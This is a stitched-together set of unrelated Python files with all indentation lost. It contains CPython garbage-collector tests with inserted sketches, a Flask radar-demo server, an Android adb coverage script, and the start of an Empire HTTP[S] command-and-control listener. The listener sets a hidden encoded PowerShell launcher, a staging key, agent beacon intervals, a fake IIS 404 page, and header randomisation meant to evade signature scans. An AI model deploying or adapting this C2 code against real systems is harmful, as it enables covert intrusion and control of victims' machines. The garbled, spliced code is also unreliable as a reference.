# NOTE: types with special optimizations (e.g. tuple) have tests
# in their own test files instead.
self.assertFalse(gc.is_tracked(None))
self.assertFalse(gc.is_tracked(1))
self.assertFalse(gc.is_tracked(1.0))
self.assertFalse(gc.is_tracked(1.0 + 5.0j))
self.assertFalse(gc.is_tracked(True))
self.assertFalse(gc.is_tracked(False))
self.assertFalse(gc.is_tracked(b"a"))
self.assertFalse(gc.is_tracked("a"))
self.assertFalse(gc.is_tracked(bytearray(b"a")))
self.assertFalse(gc.is_tracked(type))
self.assertFalse(gc.is_tracked(int))
self.assertFalse(gc.is_tracked(object))
self.assertFalse(gc.is_tracked(object()))
class UserClass:
pass
class UserInt(int):
pass
# Base class is object; no extra fields.
class UserClassSlots:
__slots__ = ()
# Base class is fixed size larger than object; no extra fields.
class UserFloatSlots(float):
__slots__ = ()
# Base class is variable size; no extra fields.
class UserIntSlots(int):
__slots__ = ()
self.assertTrue(gc.is_tracked(gc))
self.assertTrue(gc.is_tracked(UserClass))
self.assertTrue(gc.is_tracked(UserClass()))
self.assertTrue(gc.is_tracked(UserInt()))
self.assertTrue(gc.is_tracked([]))
self.assertTrue(gc.is_tracked(set()))
self.assertFalse(gc.is_tracked(UserClassSlots()))
self.assertFalse(gc.is_tracked(UserFloatSlots()))
self.assertFalse(gc.is_tracked(UserIntSlots()))
def test_bug1055820b(self):
# Corresponds to temp2b.py in the bug report.
ouch = []
def callback(ignored):
ouch[:] = [wr() for wr in WRs]
Cs = [C1055820(i) for i in range(2)]
WRs = [weakref.ref(c, callback) for c in Cs]
c = None
gc.collect()
self.assertEqual(len(ouch), 0)
# Make the two instances trash, and collect again. The bug was that
# the callback materialized a strong reference to an instance, but gc
# cleared the instance's dict anyway.
Cs = None
gc.collect()
self.assertEqual(len(ouch), 2) # else the callbacks didn't run
for x in ouch:
# If the callback resurrected one of these guys, the instance
# would be damaged, with an empty __dict__.
self.assertEqual(x, None)
def test_bug21435(self):
# This is a poor test - its only virtue is that it happened to
# segfault on Tim's Windows box before the patch for 21435 was
# applied. That's a nasty bug relying on specific pieces of cyclic
# trash appearing in exactly the right order in finalize_garbage()'s
# input list.
# But there's no reliable way to force that order from Python code,
# so over time chances are good this test won't really be testing much
# of anything anymore. Still, if it blows up, there's _some_
# problem ;-)
gc.collect()
class A:
pass
class B:
def __init__(self, x):
self.x = x
def __del__(self):
self.attr = None
def do_work():
a = A()
b = B(A())
a.attr = b
b.attr = a
do_work()
gc.collect() # this blows up (bad C pointer) when it fails
@cpython_only
def test_garbage_at_shutdown(self):
import subprocess
code = """if 1:
import gc
import _testcapi
@_testcapi.with_tp_del
class X:
def __init__(self, name):
self.name = name
def __repr__(self):
return "<X %%r>" %% self.name
def __tp_del__(self):
pass
x = X('first')
x.x = x
x.y = X('second')
del x
gc.set_debug(%s)
"""
def run_command(code):
p = subprocess.Popen([sys.executable, "-Wd", "-c", code],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
p.stdout.close()
p.stderr.close()
self.assertEqual(p.returncode, 0)
self.assertEqual(stdout.strip(), b"")
return strip_python_stderr(stderr)
stderr = run_command(code % "0")
self.assertIn(b"ResourceWarning: gc: 2 uncollectable objects at "
b"shutdown; use", stderr)
self.assertNotIn(b"<X 'first'>", stderr)
# With DEBUG_UNCOLLECTABLE, the garbage list gets printed
stderr = run_command(code % "gc.DEBUG_UNCOLLECTABLE")
self.assertIn(b"ResourceWarning: gc: 2 uncollectable objects at "
b"shutdown", stderr)
self.assertTrue(
(b"[<X 'first'>, <X 'second'>]" in stderr) or
(b"[<X 'second'>, <X 'first'>]" in stderr), stderr)
# With DEBUG_SAVEALL, no additional message should get printed
# (because gc.garbage also contains normally reclaimable cyclic
# references, and its elements get printed at runtime anyway).
stderr = run_command(code % "gc.DEBUG_SAVEALL")
self.assertNotIn(b"uncollectable objects at shutdown", stderr)
@requires_type_collecting
def test_gc_main_module_at_shutdown(self):
# Create a reference cycle through the __main__ module and check
# it gets collected at interpreter shutdown.
code = """if 1:
class C:
def __del__(self):
print('__del__ called')
l = [C()]
l.append(l)
"""
rc, out, err = assert_python_ok('-c', code)
self.assertEqual(out.strip(), b'__del__ called')
@requires_type_collecting
def test_gc_ordinary_module_at_shutdown(self):
# Same as above, but with a non-__main__ module.
with temp_dir() as script_dir:
module = """if 1:
class C:
def __del__(self):
print('__del__ called')
l = [C()]
l.append(l)
"""
code = """if 1:
import sys
sys.path.insert(0, %r)
import gctest
""" % (script_dir,)
make_script(script_dir, 'gctest', module)
rc, out, err = assert_python_ok('-c', code)
self.assertEqual(out.strip(), b'__del__ called')
@requires_type_collecting
def test_global_del_SystemExit(self):
code = """if 1:
class ClassWithDel:
def __del__(self):
print('__del__ called')
a = ClassWithDel()
a.link = a
raise SystemExit(0)"""
self.addCleanup(unlink, TESTFN)
with open(TESTFN, 'w') as script:
script.write(code)
rc, out, err = assert_python_ok(TESTFN)
self.assertEqual(out.strip(), b'__del__ called')
def test_get_stats(self):
stats = gc.get_stats()
self.assertEqual(len(stats), 3)
for st in stats:
self.assertIsInstance(st, dict)
self.assertEqual(set(st),
{"collected", "collections", "uncollectable"})
self.assertGreaterEqual(st["collected"], 0)
self.assertGreaterEqual(st["collections"], 0)
self.assertGreaterEqual(st["uncollectable"], 0)
# Check that collection counts are incremented correctly
if gc.isenabled():
self.addCleanup(gc.enable)
gc.disable()
old = gc.get_stats()
gc.collect(0)
new = gc.get_stats()
self.assertEqual(new[0]["collections"], old[0]["collections"] + 1)
self.assertEqual(new[1]["collections"], old[1]["collections"])
self.assertEqual(new[2]["collections"], old[2]["collections"])
gc.collect(2)
new = gc.get_stats()
self.assertEqual(new[0]["collections"], old[0]["collections"] + 1)
self.assertEqual(new[1]["collections"], old[1]["collections"])
self.assertEqual(new[2]["collections"], old[2]["collections"] + 1)
def test_freeze(self):
gc.freeze()
self.assertGreater(gc.get_freeze_count(), 0)
gc.unfreeze()
self.assertEqual(gc.get_freeze_count(), 0)
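# A minimal sketch (not part of the original suite) of the documented use case for
# freeze()/unfreeze(): moving everything currently tracked into the permanent
# generation right before fork(), so later collections in the parent do not dirty
# copy-on-write pages shared with children.  Assumes a POSIX platform where
# os.fork() is available.
def _freeze_before_fork():
    import os
    gc.disable()   # disable early in the parent, per the gc module docs
    gc.freeze()    # frozen objects are never examined by the collector again
    pid = os.fork()
    if pid == 0:
        gc.enable()  # the child still collects objects it creates itself
    return pid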
def test_get_objects(self):
gc.collect()
l = []
l.append(l)
self.assertTrue(
any(l is element for element in gc.get_objects(generation=0))
)
self.assertFalse(
any(l is element for element in gc.get_objects(generation=1))
)
self.assertFalse(
any(l is element for element in gc.get_objects(generation=2))
)
gc.collect(generation=0)
self.assertFalse(
any(l is element for element in gc.get_objects(generation=0))
)
self.assertTrue(
any(l is element for element in gc.get_objects(generation=1))
)
self.assertFalse(
any(l is element for element in gc.get_objects(generation=2))
)
gc.collect(generation=1)
self.assertFalse(
any(l is element for element in gc.get_objects(generation=0))
)
self.assertFalse(
any(l is element for element in gc.get_objects(generation=1))
)
self.assertTrue(
any(l is element for element in gc.get_objects(generation=2))
)
gc.collect(generation=2)
self.assertFalse(
any(l is element for element in gc.get_objects(generation=0))
)
self.assertFalse(
any(l is element for element in gc.get_objects(generation=1))
)
self.assertTrue(
any(l is element for element in gc.get_objects(generation=2))
)
del l
gc.collect()
def test_get_objects_arguments(self):
gc.collect()
self.assertEqual(len(gc.get_objects()),
len(gc.get_objects(generation=None)))
self.assertRaises(ValueError, gc.get_objects, 1000)
self.assertRaises(ValueError, gc.get_objects, -1000)
self.assertRaises(TypeError, gc.get_objects, "1")
self.assertRaises(TypeError, gc.get_objects, 1.234)
def test_38379(self):
# When a finalizer resurrects objects, stats were reporting them as
# having been collected. This affected both collect()'s return
# value and the dicts returned by get_stats().
N = 100
class A: # simple self-loop
def __init__(self):
self.me = self
class Z(A): # resurrecting __del__
def __del__(self):
zs.append(self)
zs = []
def getstats():
d = gc.get_stats()[-1]
return d['collected'], d['uncollectable']
gc.collect()
gc.disable()
# No problems if just collecting A() instances.
oldc, oldnc = getstats()
for i in range(N):
A()
t = gc.collect()
c, nc = getstats()
self.assertEqual(t, 2*N) # instance object & its dict
self.assertEqual(c - oldc, 2*N)
self.assertEqual(nc - oldnc, 0)
# But Z() is not actually collected.
oldc, oldnc = c, nc
Z()
# Nothing is collected - Z() is merely resurrected.
t = gc.collect()
c, nc = getstats()
#self.assertEqual(t, 2) # before
self.assertEqual(t, 0) # after
#self.assertEqual(c - oldc, 2) # before
self.assertEqual(c - oldc, 0) # after
self.assertEqual(nc - oldnc, 0)
# Unfortunately, a Z() prevents _anything_ from being collected.
# It should be possible to collect the A instances anyway, but
# that will require non-trivial code changes.
oldc, oldnc = c, nc
for i in range(N):
A()
Z()
# Z() prevents anything from being collected.
t = gc.collect()
c, nc = getstats()
#self.assertEqual(t, 2*N + 2) # before
self.assertEqual(t, 0) # after
#self.assertEqual(c - oldc, 2*N + 2) # before
self.assertEqual(c - oldc, 0) # after
self.assertEqual(nc - oldnc, 0)
# But the A() trash is reclaimed on the next run.
oldc, oldnc = c, nc
t = gc.collect()
c, nc = getstats()
self.assertEqual(t, 2*N)
self.assertEqual(c - oldc, 2*N)
self.assertEqual(nc - oldnc, 0)
gc.enable()
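# A minimal sketch (not part of the original suite) of the callback protocol that
# GCCallbackTests below exercises: every callable in gc.callbacks is invoked with a
# phase ("start" or "stop") and an info dict carrying the "generation", "collected"
# and "uncollectable" counts for that run.
def _gc_callback_demo():
    events = []
    def cb(phase, info):
        events.append((phase, info["generation"], info["collected"], info["uncollectable"]))
    gc.callbacks.append(cb)
    try:
        gc.collect()
    finally:
        gc.callbacks.remove(cb)
    return events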
class GCCallbackTests(unittest.TestCase):
def setUp(self):
# Save gc state and disable it.
self.enabled = gc.isenabled()
gc.disable()
self.debug = gc.get_debug()
gc.set_debug(0)
gc.callbacks.append(self.cb1)
gc.callbacks.append(self.cb2)
self.othergarbage = []
def tearDown(self):
# Restore gc state
del self.visit
gc.callbacks.remove(self.cb1)
gc.callbacks.remove(self.cb2)
gc.set_debug(self.debug)
if self.enabled:
gc.enable()
# destroy any uncollectables
gc.collect()
for obj in gc.garbage:
if isinstance(obj, Uncollectable):
obj.partner = None
del gc.garbage[:]
del self.othergarbage
gc.collect()
def preclean(self):
# Remove all fluff from the system. Invoke this function
# manually rather than through self.setUp() for maximum
# safety.
self.visit = []
gc.collect()
garbage, gc.garbage[:] = gc.garbage[:], []
self.othergarbage.append(garbage)
self.visit = []
def cb1(self, phase, info):
self.visit.append((1, phase, dict(info)))
def cb2(self, phase, info):
self.visit.append((2, phase, dict(info)))
if phase == "stop" and hasattr(self, "cleanup"):
# Clean Uncollectable from garbage
uc = [e for e in gc.garbage if isinstance(e, Uncollectable)]
gc.garbage[:] = [e for e in gc.garbage
if not isinstance(e, Uncollectable)]
for e in uc:
e.partner = None
def test_collect(self):
self.preclean()
gc.collect()
# Algorithmically verify the contents of self.visit
# because it is long and tortuous.
# Count the number of visits to each callback
n = [v[0] for v in self.visit]
n1 = [i for i in n if i == 1]
n2 = [i for i in n if i == 2]
self.assertEqual(n1, [1]*2)
self.assertEqual(n2, [2]*2)
# Count that we got the right number of start and stop callbacks.
n = [v[1] for v in self.visit]
n1 = [i for i in n if i == "start"]
n2 = [i for i in n if i == "stop"]
self.assertEqual(n1, ["start"]*2)
self.assertEqual(n2, ["stop"]*2)
# Check that we got the right info dict for all callbacks
for v in self.visit:
info = v[2]
self.assertTrue("generation" in info)
self.assertTrue("collected" in info)
self.assertTrue("uncollectable" in info)
def test_collect_generation(self):
self.preclean()
gc.collect(2)
for v in self.visit:
info = v[2]
self.assertEqual(info["generation"], 2)
@cpython_only
def test_collect_garbage(self):
self.preclean()
# Each of these creations causes four objects to become garbage: two
# Uncollectables and their instance dicts.
Uncollectable()
Uncollectable()
C1055820(666)
gc.collect()
for v in self.visit:
if v[1] != "stop":
continue
info = v[2]
self.assertEqual(info["collected"], 2)
self.assertEqual(info["uncollectable"], 8)
# We should now have the Uncollectables in gc.garbage
self.assertEqual(len(gc.garbage), 4)
for e in gc.garbage:
self.assertIsInstance(e, Uncollectable)
# Now, let our callback handle the Uncollectable instances
self.cleanup=True
self.visit = []
gc.garbage[:] = []
gc.collect()
for v in self.visit:
if v[1] != "stop":
continue
info = v[2]
self.assertEqual(info["collected"], 0)
self.assertEqual(info["uncollectable"], 4)
# Uncollectables should be gone
self.assertEqual(len(gc.garbage), 0)
@unittest.skipIf(BUILD_WITH_NDEBUG,
'built with -NDEBUG')
def test_refcount_errors(self):
self.preclean()
# Verify the "handling" of objects with broken refcounts
# Skip the test if ctypes is not available
import_module("ctypes")
import subprocess
code = textwrap.dedent('''
from test.support import gc_collect, SuppressCrashReport
a = [1, 2, 3]
b = [a]
# Avoid coredump when Py_FatalError() calls abort()
SuppressCrashReport().__enter__()
# Simulate the refcount of "a" being too low (compared to the
# references held on it by live data), but keeping it above zero
# (to avoid deallocating it):
import ctypes
ctypes.pythonapi.Py_DecRef(ctypes.py_object(a))
# The garbage collector should now have a fatal error
# when it reaches the broken object
gc_collect()
''')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
p.stdout.close()
p.stderr.close()
# Verify that stderr has a useful error message:
self.assertRegex(stderr,
br'gcmodule\.c:[0-9]+: gc_decref: Assertion "gc_get_refs\(g\) > 0" failed.')
self.assertRegex(stderr,
br'refcount is too small')
# "address : 0x7fb5062efc18"
# "address : 7FB5062EFC18"
address_regex = br'[0-9a-fA-Fx]+'
self.assertRegex(stderr,
br'object address : ' + address_regex)
self.assertRegex(stderr,
br'object refcount : 1')
self.assertRegex(stderr,
br'object type : ' + address_regex)
self.assertRegex(stderr,
br'object type name: list')
self.assertRegex(stderr,
br'object repr : \[1, 2, 3\]')
class GCTogglingTests(unittest.TestCase):
def setUp(self):
gc.enable()
def tearDown(self):
gc.disable()
def test_bug1055820c(self):
# Corresponds to temp2c.py in the bug report. This is pretty
# elaborate.
c0 = C1055820(0)
# Move c0 into generation 2.
gc.collect()
c1 = C1055820(1)
c1.keep_c0_alive = c0
del c0.loop # now only c1 keeps c0 alive
c2 = C1055820(2)
c2wr = weakref.ref(c2) # no callback!
ouch = []
def callback(ignored):
ouch[:] = [c2wr()]
# The callback gets associated with a wr on an object in generation 2.
c0wr = weakref.ref(c0, callback)
c0 = c1 = c2 = None
# What we've set up: c0, c1, and c2 are all trash now. c0 is in
# generation 2. The only thing keeping it alive is that c1 points to
# it. c1 and c2 are in generation 0, and are in self-loops. There's a
# global weakref to c2 (c2wr), but that weakref has no callback.
# There's also a global weakref to c0 (c0wr), and that does have a
# callback, and that callback references c2 via c2wr().
#
# c0 has a wr with callback, which references c2wr
# ^
# |
# | Generation 2 above dots
#. . . . . . . .|. . . . . . . . . . . . . . . . . . . . . . . .
# | Generation 0 below dots
# |
# |
# ^->c1 ^->c2 has a wr but no callback
# | | | |
# <--v <--v
#
# So this is the nightmare: when generation 0 gets collected, we see
# that c2 has a callback-free weakref, and c1 doesn't even have a
# weakref. Collecting generation 0 doesn't see c0 at all, and c0 is
# the only object that has a weakref with a callback. gc clears c1
# and c2. Clearing c1 has the side effect of dropping the refcount on
# c0 to 0, so c0 goes away (despite that it's in an older generation)
# and c0's wr callback triggers. That in turn materializes a reference
# to c2 via c2wr(), but c2 gets cleared anyway by gc.
# We want to let gc happen "naturally", to preserve the distinction
# between generations.
junk = []
i = 0
detector = GC_Detector()
while not detector.gc_happened:
i += 1
if i > 10000:
self.fail("gc didn't happen after 10000 iterations")
self.assertEqual(len(ouch), 0)
junk.append([]) # this will eventually trigger gc
self.assertEqual(len(ouch), 1) # else the callback wasn't invoked
for x in ouch:
# If the callback resurrected c2, the instance would be damaged,
# with an empty __dict__.
self.assertEqual(x, None)
def test_bug1055820d(self):
# Corresponds to temp2d.py in the bug report. This is very much like
# test_bug1055820c, but uses a __del__ method instead of a weakref
# callback to sneak in a resurrection of cyclic trash.
ouch = []
class D(C1055820):
def __del__(self):
ouch[:] = [c2wr()]
d0 = D(0)
# Move all the above into generation 2.
gc.collect()
c1 = C1055820(1)
c1.keep_d0_alive = d0
del d0.loop # now only c1 keeps d0 alive
c2 = C1055820(2)
c2wr = weakref.ref(c2) # no callback!
d0 = c1 = c2 = None
# What we've set up: d0, c1, and c2 are all trash now. d0 is in
# generation 2. The only thing keeping it alive is that c1 points to
# it. c1 and c2 are in generation 0, and are in self-loops. There's
# a global weakref to c2 (c2wr), but that weakref has no callback.
# There are no other weakrefs.
#
# d0 has a __del__ method that references c2wr
# ^
# |
# | Generation 2 above dots
#. . . . . . . .|. . . . . . . . . . . . . . . . . . . . . . . .
# | Generation 0 below dots
# |
# |
# ^->c1 ^->c2 has a wr but no callback
# | | | |
# <--v <--v
#
# So this is the nightmare: when generation 0 gets collected, we see
# that c2 has a callback-free weakref, and c1 doesn't even have a
# weakref. Collecting generation 0 doesn't see d0 at all. gc clears
# c1 and c2. Clearing c1 has the side effect of dropping the refcount
# on d0 to 0, so d0 goes away (despite that it's in an older
# generation) and d0's __del__ triggers. That in turn materializes
# a reference to c2 via c2wr(), but c2 gets cleared anyway by gc.
# We want to let gc happen "naturally", to preserve the distinction
# between generations.
detector = GC_Detector()
junk = []
i = 0
while not detector.gc_happened:
i += 1
if i > 10000:
self.fail("gc didn't happen after 10000 iterations")
self.assertEqual(len(ouch), 0)
junk.append([]) # this will eventually trigger gc
self.assertEqual(len(ouch), 1) # else __del__ wasn't invoked
for x in ouch:
# If __del__ resurrected c2, the instance would be damaged, with an
# empty __dict__.
self.assertEqual(x, None)
def test_main():
enabled = gc.isenabled()
gc.disable()
assert not gc.isenabled()
debug = gc.get_debug()
gc.set_debug(debug & ~gc.DEBUG_LEAK) # this test is supposed to leak
try:
gc.collect() # Delete 2nd generation garbage
run_unittest(GCTests, GCTogglingTests, GCCallbackTests)
finally:
gc.set_debug(debug)
# test gc.enable() even if GC is disabled by default
if verbose:
print("restoring automatic collection")
# make sure to always test gc.enable()
gc.enable()
assert gc.isenabled()
if not enabled:
gc.disable()
if __name__ == "__main__":
test_main()
|
http_server.py
|
import os
import signal
from datetime import datetime
from functools import update_wrapper, wraps
from threading import Thread, Timer
import flask
from flask import request
from server.demo_control import DemoControl
from server.detector_wrappers import EnvelopeHandler, IQHandler, PowerBinHandler, SparseHandler
# TODO: The Flask framework does not support a global shared state like the demo_ctrl object
# below. It seems to work anyway when using the built-in development server. For better
# reliability and scaling, this file should be rewritten for another framework, e.g.
# Twisted, that is better suited to handling a common state shared between
# different HTTP sessions.
demo_ctrl = DemoControl()
app = flask.Flask(__name__, static_url_path="/static")
def nocache(view):
@wraps(view)
def no_cache(*args, **kwargs):
response = flask.make_response(view(*args, **kwargs))
response.headers["Last-Modified"] = datetime.now()
response.headers["Cache-Control"] = (
"no-store, no-cache, must-revalidate, post-check=0," " pre-check=0, max-age=0"
)
response.headers["Pragma"] = "no-cache"
response.headers["Expires"] = "-1"
return response
return update_wrapper(no_cache, view)
@app.route("/")
@nocache
def root():
return app.send_static_file("index.html")
def shutdown_server():
print("Shutting down")
os.kill(os.getpid(), signal.SIGINT)
@app.route("/exit", methods=["GET"])
def shutdown():
t = Timer(1.0, shutdown_server)
t.start()
return '{"ok": null}'
@app.route("/<path:path>")
@nocache
def static_file(path):
return app.send_static_file(path)
def event_stream():
mess_queue = demo_ctrl.subscribe()
while True:
mess = mess_queue.get()
yield "data:" + mess + "\n\n"
@app.route("/stream")
def stream():
return flask.Response(
event_stream(), mimetype="text/event-stream", headers={"Access-Control-Allow-Origin": "*"}
)
@app.route("/start/<detector_name>")
def detector_start(detector_name):
print("got start %s" % detector_name)
print("params %s" % request.args)
res = demo_ctrl.start_detector(detector_name, request.args)
print(request.args)
return flask.jsonify(res)
@app.route("/stop")
def button_stop():
res = demo_ctrl.stop_detector()
return flask.jsonify(res)
@app.route("/rvc/<command>/<value>")
def rvc2(command, value):
if command in ["start", "stop", "turn"]:
print("Got command: %s" % command)
demo_ctrl.put_cmd(["rvc_command", command, value])
res = {"ok": None}
else:
print("Got unknown command: %s" % command)
res = {"error": "Unknown RVC command: %s" % command}
return flask.jsonify(res)
def worker_thread_main_loop():
while demo_ctrl.process_next():
pass
print("Worker thread stopped")
def stop_server():
demo_ctrl.put_cmd(["exit"])
def start_server(args):
old_handler = signal.getsignal(signal.SIGINT)
def signal_handler(sig, frame):
print("CTRL-C pressed!")
stop_server()
old_handler(sig, frame)
signal.signal(signal.SIGINT, signal_handler)
demo_ctrl.set_streaming_client_args(args)
demo_ctrl.add_detector(PowerBinHandler)
demo_ctrl.add_detector(EnvelopeHandler)
demo_ctrl.add_detector(IQHandler)
demo_ctrl.add_detector(SparseHandler)
main_loop_worker = Thread(target=worker_thread_main_loop)
main_loop_worker.start()
app.run(host="localhost", threaded=True)
print("http server stopped")
|
act_coverage.py
|
# Copyright (c) 2016-present, Ke Mao. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# * The names of the contributors may not be used to endorse or
# promote products derived from this software without specific
# prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os, sys, shutil, datetime, time
from lxml import html
from bs4 import UnicodeDammit
import settings
import subprocess, threading
from crashes import crash_handler
class Command(object):
def __init__(self, cmd):
self.cmd = cmd
self.process = None
def run(self, timeout):
def target():
print '... Evaluate Script Thread started'
self.process = subprocess.Popen(self.cmd, shell=True)
self.process.communicate()
print '... Evaluate Script Thread finished'
thread = threading.Thread(target=target)
thread.start()
thread.join(timeout)
if thread.is_alive():
print 'Terminating process'
self.process.terminate()
# os.system("kill -9 $(lsof -i:5037 | tail -n +2 | awk '{print $2}')")
# os.system("adb devices")
thread.join()
print self.process.returncode
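# For reference, a minimal sketch of the same run-with-timeout behaviour using the
# Python 3 standard library (this module itself targets Python 2, so the snippet is
# left as a comment):
#
#   import subprocess
#   try:
#       subprocess.run(cmd, shell=True, timeout=timeout)
#   except subprocess.TimeoutExpired:
#       pass  # run() kills the child and waits for it once the timeout expires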
def cal_coverage(path, gen, pop):
activities = set()
for file_name in os.listdir(path):
if file_name.startswith("activity.coverage." + str(gen) + "." + str(pop) + "."):
file_path = path + file_name
file_coverage = open(file_path)
for line in file_coverage:
activities.add(line.strip())
file_coverage.close()
return 10.0 * len(activities)
# return cumulative activity coverage and the number of unique crashes
def get_suite_coverage(scripts, device, apk_dir, package_name, gen, pop):
unique_crashes = set()
# clean states
os.system("adb -s " + device + " shell am force-stop " + package_name)
os.system("adb -s " + device + " shell pm clear " + package_name)
# os.system("rm " + apk_dir + "/intermediate/activity.coverage.*")
# run scripts
for index, script in enumerate(scripts):
start_target = "adb -s " + device + " shell motifcore -p " + package_name + " -c android.intent.category.LAUNCHER 1"
os.system(start_target)
os.system("adb -s " + device + " push " + script + " /mnt/sdcard/")
script_name = script.split("/")[-1]
# command = Command("adb -s " + device + " shell motifcore -p " + package_name + " --bugreport --throttle " + str(
# settings.THROTTLE) + " -f /mnt/sdcard/" + script_name + " 1")
# command = Command("adb -s " + device + " shell motifcore -p " + package_name + " --bugreport " + "-f /mnt/sdcard/" + script_name + " 1")
# command.run(timeout=600)
cmd = "adb -s " + device + " shell motifcore -p " + package_name + " --bugreport --string-seeding /mnt/sdcard/" + package_name + "_strings.xml" + " -f /mnt/sdcard/" + script_name + " 1"
os.system(settings.TIMEOUT_CMD + " " + str(settings.EVAL_TIMEOUT) + " " + cmd)
# need to manually kill motifcore when timeout
kill_motifcore_cmd = "shell ps | awk '/com\.android\.commands\.motifcore/ { system(\"adb -s " + device + " shell kill \" $2) }'"
os.system("adb -s " + device + " " + kill_motifcore_cmd)
os.system("adb -s " + device + " pull /sdcard/activity.coverage " + apk_dir + "/coverages/activity.coverage." + str(gen) + "." + str(pop) + "." + str(index))
crash_handler.handle(device, apk_dir, script, gen, pop, index, unique_crashes)
# close app
os.system("adb -s " + device + " shell pm clear " + package_name)
os.system("adb -s " + device + " shell am force-stop " + package_name)
coverage = cal_coverage(apk_dir + "/coverages/", gen, pop)
# print "\n\n\n### get_suite_coverage: Coverage, num crashes =", coverage, ",", len(unique_crashes)
return coverage, len(unique_crashes)
|
http.py
|
import logging
import base64
import sys
import random
import os
import ssl
import time
import copy
import sys
from pydispatch import dispatcher
from flask import Flask, request, make_response, send_from_directory
# Empire imports
from lib.common import helpers
from lib.common import agents
from lib.common import encryption
from lib.common import packets
from lib.common import messages
from lib.common import templating
from lib.common import obfuscation
class Listener:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'HTTP[S]',
'Author': ['@harmj0y'],
'Description': ('Starts a http[s] listener (PowerShell or Python) that uses a GET/POST approach.'),
'Category' : ('client_server'),
'Comments': []
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Name' : {
'Description' : 'Name for the listener.',
'Required' : True,
'Value' : 'http'
},
'Host' : {
'Description' : 'Hostname/IP for staging.',
'Required' : True,
'Value' : "http://%s:%s" % (helpers.lhost(), 80)
},
'BindIP' : {
'Description' : 'The IP to bind to on the control server.',
'Required' : True,
'Value' : '0.0.0.0'
},
'Port' : {
'Description' : 'Port for the listener.',
'Required' : True,
'Value' : 80
},
'Launcher' : {
'Description' : 'Launcher string.',
'Required' : True,
'Value' : 'powershell -noP -sta -w 1 -enc '
},
'StagingKey' : {
'Description' : 'Staging key for initial agent negotiation.',
'Required' : True,
'Value' : '2c103f2c4ed1e59c0b4e2e01821770fa'
},
'DefaultDelay' : {
'Description' : 'Agent delay/reach back interval (in seconds).',
'Required' : True,
'Value' : 5
},
'DefaultJitter' : {
'Description' : 'Jitter in agent reachback interval (0.0-1.0).',
'Required' : True,
'Value' : 0.0
},
'DefaultLostLimit' : {
'Description' : 'Number of missed checkins before exiting',
'Required' : True,
'Value' : 60
},
'DefaultProfile' : {
'Description' : 'Default communication profile for the agent.',
'Required' : True,
'Value' : "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
},
'CertPath' : {
'Description' : 'Certificate path for https listeners.',
'Required' : False,
'Value' : ''
},
'KillDate' : {
'Description' : 'Date for the listener to exit (MM/dd/yyyy).',
'Required' : False,
'Value' : ''
},
'WorkingHours' : {
'Description' : 'Hours for the agent to operate (09:00-17:00).',
'Required' : False,
'Value' : ''
},
'ServerVersion' : {
'Description' : 'Server header for the control server.',
'Required' : True,
'Value' : 'Microsoft-IIS/7.5'
},
'StagerURI' : {
'Description' : 'URI for the stager. Must use /download/. Example: /download/stager.php',
'Required' : False,
'Value' : ''
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'SlackToken' : {
'Description' : 'Your SlackBot API token to communicate with your Slack instance.',
'Required' : False,
'Value' : ''
},
'SlackChannel' : {
'Description' : 'The Slack channel or DM that notifications will be sent to.',
'Required' : False,
'Value' : '#general'
}
}
# required:
self.mainMenu = mainMenu
self.threads = {}
# optional/specific for this module
self.app = None
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
# set the default staging key to the controller db default
self.options['StagingKey']['Value'] = str(helpers.get_config('staging_key')[0])
# randomize the length of the default_response and index_page headers to evade signature based scans
self.header_offset = random.randint(0, 64)
def default_response(self):
"""
Returns an IIS 7.5 404 not found page.
"""
return '\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>',
'<title>404 - File or directory not found.</title>',
'<style type="text/css">',
'<!--',
'body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}',
'fieldset{padding:0 15px 10px 15px;}',
'h1{font-size:2.4em;margin:0;color:#FFF;}',
'h2{font-size:1.7em;margin:0;color:#CC0000;}',
'h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}',
